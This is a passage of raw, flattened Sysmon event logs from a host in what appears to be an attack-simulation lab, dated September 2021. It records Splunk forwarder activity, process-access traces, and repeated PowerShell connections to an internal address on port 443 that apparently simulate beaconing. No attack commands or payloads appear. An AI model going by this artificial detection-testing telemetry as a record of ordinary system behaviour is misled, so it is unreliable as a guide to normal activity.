Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036497700Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:39.805{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86C6DB121372D55877D6B017A9502FD7,SHA256=E8107C41C5A49588FA51323608213E5B28070ED2AFE738C4E84EEA7505797319,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497699Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:39.774{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F6094344C4B8CFFA8A326FFA7C3E5D62,SHA256=737850B82841FC30DE68D8BA31CCF22A949549214257CF7C7E7CFF4C38ED5779,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497698Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:39.270{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A12F-6140-8C56-04000000C801}2616C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497697Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:39.270{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497696Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:39.270{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497695Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:39.270{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497694Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:39.270{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497693Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:39.270{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-A12F-6140-8C56-04000000C801}2616C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036497692Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:39.270{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A12F-6140-8C56-04000000C801}2616C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036497691Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:39.256{B81B27B7-A12F-6140-8C56-04000000C801}2616C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036497703Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:40.820{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6543E5CB573AA8DEDAD5334705CACEEB,SHA256=3A0354C231B0524FCCA0E5DC223A2A1FEFE7D05C85FEA359B3E985749E472397,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497702Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:10.303{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50564-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497701Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:40.289{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BDC52643E25FEDD6FA6C02D06AA1332B,SHA256=73E21B5C251797FB644449B824C20C878263CF756F259731A118ADEC52217505,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497704Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:41.839{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA16A7B0768E31D35E2DFCA5D996D412,SHA256=324F5B2D9B25450A66425B30E3DE184E0C4640BBE1B47C3F90867A10287F22D4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497705Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:42.855{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=96F2048E55ACD771716A13711C8B488D,SHA256=DD74507343BF36D02DBE8D6211A1AC0230E1EC653FA313F3A224E38C97DF778B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497707Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:43.885{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F90021D8721D61C48EEB9059C83C843E,SHA256=495F88900FBFA0715E2580FEE5DAF6C5FDA599712ECF2ED41D761F73AF08C0D3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497706Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:13.740{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50565-false10.0.1.12-8000- 23542300x800000000000000036497709Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:44.916{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A8156214AC7DC237A2A2313B9793ED5,SHA256=866A02C3857CB98E75368756EC2F67600D182A1CB4B5F9929094FFB0C3E644C1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497708Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:44.669{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B14664C6E93626CE5A6034485CF2C48F,SHA256=8F9FC040E7D39B2E66B885ABC4CD8424F574BC29C90075CB3636B9E0CB33555E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497711Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:45.935{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E4ACE1ADC85512961341D6B463179FE7,SHA256=7BACCBA908C2C582DF5A32479B244716647E2F2B34B52DF57EF537A11115F934,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497710Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:15.317{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50566-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497712Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:46.951{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF58E4062AA0884D4089207D09881A07,SHA256=7301C9AF382C2533C505BA99DA47E004F1D9F190F8D454645FCDE63E5D423581,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497713Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:47.981{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE32DE4915BD23D14C281EA4B3CF9ACE,SHA256=F58AC4223DA57194B5E3CEFEF58DD534475529C12EA97E5F4511674BEEDC67BF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497715Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:49.664{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=175ACAB3351F43A60B64D452627E97BB,SHA256=7D01A0667FF6A1FE9FAE9B82FEFBDC2D770C7AE289BD8D296407502298593C47,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497714Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:49.029{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE13F2AA72775940DB1E8F710B64AC73,SHA256=782B72390BE8304EA83F936DB7DAB2896F4D84B01EC537573FD14D07A646897A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497718Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:20.334{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50568-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000036497717Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:19.734{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50567-false10.0.1.12-8000- 23542300x800000000000000036497716Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:50.064{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74B4B95E185CCE7F59F93C2BBCEA39DD,SHA256=CA31BEAF3343BE1E93A2132FE705C3C0B7F5F0534046FC000402BE2A04B4E185,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497719Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:51.078{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D56AF5FCB482D6DF2567FDD40734645C,SHA256=0F8D2CBB924FC0FC25A9A3B63927209180DAE9ACE6EF4B1AB81318E8B00F1643,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497720Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:52.093{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62C34177163756A0F8C8F277450517D9,SHA256=5A7BB66BEF0960475D4529C8856A718820857BD9A9CD055F918673B55754C12B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497721Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:53.107{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3AC7476A2814FE9A126EDA3BEF26A6F9,SHA256=8DC42FB4E06C04FBA9C59AE7086E81641DEA761D48C223012B1C55BF3C7A8670,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497723Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:54.674{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F70AF3143C1BCF2F7EFD1E0B618819D8,SHA256=F7FDA8CE06F67B083768D4D8B379CEFAB0E1FE1CE123E131E10ED7B4093AF5F5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497722Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:54.159{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C481A5AC61F14A1E4B6A6AE24E0B7C0B,SHA256=BD3A0C782629EC45F5522ECEDECCF29CB9BEE8DDF5D2F05F43AD23F63C787158,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497725Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:25.345{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50569-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497724Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:55.174{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A53B80BAB402B71A4D375B98AC59F53A,SHA256=924CC8CE6D8F1F292E6C331DF045CF131DD04E1E086DF654EAB13501781529F7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497727Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:25.760{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50570-false10.0.1.12-8000- 23542300x800000000000000036497726Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:56.193{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F780A72F0CC4263009F584223CACA28,SHA256=585479F491DEE8B595929264C8FE0FFFD2947F52FF4A19B24A041A9E1D7FF6BA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497728Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:57.207{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD69A79C93BA7584536B97596C6A1990,SHA256=651966EAFFCCE01EF1601D49AED71E37A2DAA926F876F5C0F0A055C4DE24ADF3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497729Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:58.259{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8395615700936959F5FCCA7783C3E17,SHA256=FB8CC68AE6B35B53E3CEC27B8BE4B3331E5721B954EEDBC6D1396B77BDB3FC35,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497730Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:59.275{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41834269865B4119591C515C017AA3F4,SHA256=DE09F4718FC5908B058C820A28D5D19BD7FF38A6B96F4E009F505E84B47EFDC7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497732Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:00.688{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B9601485A1D58B25F1FFA71A85F442E3,SHA256=C91FDEA71A54F547843C125DF22AA2E758364DDECB32208575AB28E87DC2F0DB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497731Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:00.289{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E694133A850157F9539743C27A658E1,SHA256=311866AFA53959B86E3B6CCA309D65099A7D2FA293CD5000EDBE14A6E3762BD0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497735Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:01.303{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C85B6FB20E14A103380E84AB8F655DFC,SHA256=EAAE0CB07A7C511D7590016A2ABCD3ABDCD14770AC74109260FD19A38D733D7E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497734Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:31.359{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50572-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000036497733Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:30.759{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50571-false10.0.1.12-8000- 23542300x800000000000000036497736Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:02.355{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 